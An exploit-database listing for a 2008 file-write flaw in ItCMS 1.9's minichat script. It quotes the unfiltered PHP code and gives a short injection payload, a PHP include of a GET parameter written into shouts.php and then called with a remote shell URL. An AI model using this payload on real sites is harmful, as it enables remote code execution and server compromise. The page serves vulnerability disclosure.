header-logo
Suggest Exploit
vendor:
ItCMS
by:
Cod3rZ
7.5
CVSS
HIGH
Remote File Rewriting
434
CWE
Product Name: ItCMS
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: NO
Related CWE: N/A
CPE: a:itcms:itcms:1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ItCMS 1.9 Remote File Rewriting

ItCMS 1.9 is vulnerable to Remote File Rewriting. The vulnerable file is /box/minichat/boxpop.php

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in a file operation.
Source

Exploit-DB raw data:

#===========================================================================================================================#
#                                     _ ____             _        _ _                _                                      #
#                          __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                    #
#                         / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                   #
#                         \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                   #
#===========================================================================================================================#
#                                              ItCMS 1.9 Remote File Rewriting                                              #
#===========================================================================================================================#
#                                                      Author : Cod3rZ                                                      #
#===========================================================================================================================#
#                                              Site : http://cod3rz.helloweb.eu                                             #
#                                          Site : http://devilsnight.altervista.org                                         #
#===========================================================================================================================#
# Remote File Rewriting:                                                                                                    #
#===========================================================================================================================#
# /box/minichat/boxpop.php                                                                                                  #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){                                                                                                 #
# $shout = $_POST['shout'];                                                                                           	    #
# } else if ($_GET["shout"]!=""){                                                                                           #
# $shout = $_GET["shout"];                                                                                            	    #
# }                                                                                                                         #
# [...]                                                                                                                     #
# $shout = trim($shout);                                                                                                    #
# $shout = stripslashes($shout);                                                                                            #
# $shout = str_replace ("\r\n", " [br] ", $shout);                                                                          #
# $shout = first($shout);                                                                                                   #
# [...]                                                                                                                     #
# $FileName="data/shouts.php";                                                                                              #
# if($FilePointer=fopen($FileName, "a+")){                                                                                  #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n");                                       #
# fclose($FilePointer);                                                                                                     #
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout,                            #
# and then we go in data/shouts.php?rfi=[shell]                                                                             #
#===========================================================================================================================#
# There are many other bugs, find it yourself                                                                               #
#===========================================================================================================================#
# Devils Night Corporation - http://devilsnight.altervista.org                                                              #
#===========================================================================================================================#

# milw0rm.com [2008-05-02]

Navigation

Suggest Exploit

Services By CQR